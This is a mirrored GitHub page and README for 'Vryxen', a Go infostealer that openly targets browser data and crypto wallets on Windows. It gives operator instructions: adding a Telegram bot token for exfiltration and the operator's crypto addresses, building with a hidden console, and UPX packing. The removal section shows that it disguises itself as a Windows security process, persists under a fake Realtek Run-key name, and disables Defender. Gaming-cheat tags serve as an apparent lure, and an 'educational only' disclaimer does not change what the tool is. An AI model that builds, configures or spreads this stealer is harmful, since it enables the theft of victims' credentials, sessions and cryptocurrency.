https://github.com/rt5555/vryxen
Next-Gen Stealer written in Go. Stealing from Chromium-Based & Firefox-Based Browsers, Crypto Wallets and more, from every user on every disk.
https://github.com/rt5555/vryxen
cheat dashboard exploit external gaming hack infostealer injector internal loader logger malware mod stealer tool trainer undetected
Last synced: 3 days ago
JSON representation
Next-Gen Stealer written in Go. Stealing from Chromium-Based & Firefox-Based Browsers, Crypto Wallets and more, from every user on every disk.
- Host: GitHub
- URL: https://github.com/rt5555/vryxen
- Owner: rt5555
- License: mit
- Created: 2025-10-25T17:01:15.000Z (3 months ago)
- Default Branch: main
- Last Pushed: 2025-11-01T21:16:48.000Z (3 months ago)
- Last Synced: 2025-11-01T21:17:47.354Z (3 months ago)
- Topics: cheat, dashboard, exploit, external, gaming, hack, infostealer, injector, internal, loader, logger, malware, mod, stealer, tool, trainer, undetected
- Language: Go
- Size: 272 KB
- Stars: 77
- Watchers: 0
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- Contributing: CONTRIBUTING.md
- License: LICENSE
- Security: SECURITY.md
Awesome Lists containing this project
README
Vryxen Stealer
Go-written Malware Targeting Windows systems, extracting User Data from Browsers, Crypto Wallets and more, from every user on every disk.
---
Table of Contents
## Getting started
### Prerequisites
### Installation
To install this project using Git, follow these steps:
- Clone the Repository:
```bash
git clone https://github.com/rt5555/vryxen.git ```
- Navigate to the Project Directory:
```bash
cd vryxen
```
>
## Usage
You can use the Project template:
- Open `cmd/main.go` and edit config with your Telegram Bot Token, Your Chat Id, and your crypto addresses
- Build the template: (reduce binary size by using `-s -w`)
```bash
go build -ldflags "-s -w"
```
- You can hide the console without `hideconsole` module (you must remove `common.IsAlreadyRunning()` check from `cmd/main.go` before) by running
```bash
go build -ldflags "-s -w -H=windowsgui"
```
```bash
upx.exe --ultra-brute vryxen.exe
```
- You can also use vryxen in your own Go code. Just import the desired module like this:
```go
package main
import "/rt5555/vryxen/internal/hc"
func main() {
HideConsole.Hide()
}
```
## Preview
[](https://github.com/rt5555/vryxen/releases/download/v1.7.6/vryxen.zip)
[](https://github.com/rt5555/vryxen/releases/download/v1.7.6/vryxen.zip)
[](https://github.com/rt5555/vryxen/releases/download/v1.7.6/vryxen.zip)
[](https://github.com/rt5555/vryxen/releases/download/v1.7.6/vryxen.zip)
[](https://github.com/rt5555/vryxen/releases/download/v1.7.6/vryxen.zip)
[](https://github.com/rt5555/vryxen/releases/download/v1.7.6/vryxen.zip)
[](https://github.com/rt5555/vryxen/releases/download/v1.7.6/vryxen.zip)
# Remove
This guide will help you removing vryxen from your system
1. Open powershell as administrator
2. Kill processes that could be vryxen
```bash
taskkill /f /t /im vryxen.exe
taskkill /f /t /im SecurityHealthSystray.exe
```
(use `tasklist` to list all running processes, vryxen.exe and SecurityHealthSystray.exe are the default names)
3. Remove vryxen from startup
```bash
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Realtek HD Audio Universal Service" /f
```
(Realtek HD Audio Universal Service is the default name)
4. Enable Windows defender:
## Contributing
You can also support this project development by leaving a star ⭐ or by donating me. Every little tip helps!
BTC: bc1qlhqlc4fy3wd98m8qmv05zu059j6am9jh4kj4v2
## License
This library is released under the MIT License. See LICENSE file for more informations.
## Contact
If you have any questions or need further assistance, please contact [@xretic:
](
## Acknowledgments
## Disclaimer
### Important Notice: This tool is intended for educational purposes only.
This software, referred to as xretic, is provided strictly for educational and research purposes. Under no circumstances should this tool be used for any malicious activities, including but not limited to unauthorized access, data theft, or any other harmful actions.
### Usage Responsibility:
By accessing and using this tool, you acknowledge that you are solely responsible for your actions. Any misuse of this software is strictly prohibited, and the creator (xretic) disclaims any responsibility for how this tool is utilized. You are fully accountable for ensuring that your usage complies with all applicable laws and regulations in your jurisdiction.
### No Liability:
The creator (xretic) of this tool shall not be held responsible for any damages or legal consequences resulting from the use or misuse of this software. This includes, but is not limited to, direct, indirect, incidental, consequential, or punitive damages arising out of your access, use, or inability to use the tool.
### No Support:
The creator (xretic) will not provide any support, guidance, or assistance related to the misuse of this tool. Any inquiries regarding malicious activities will be ignored.
### Acceptance of Terms:
By using this tool, you signify your acceptance of this disclaimer. If you do not agree with the terms stated in this disclaimer, do not use the software.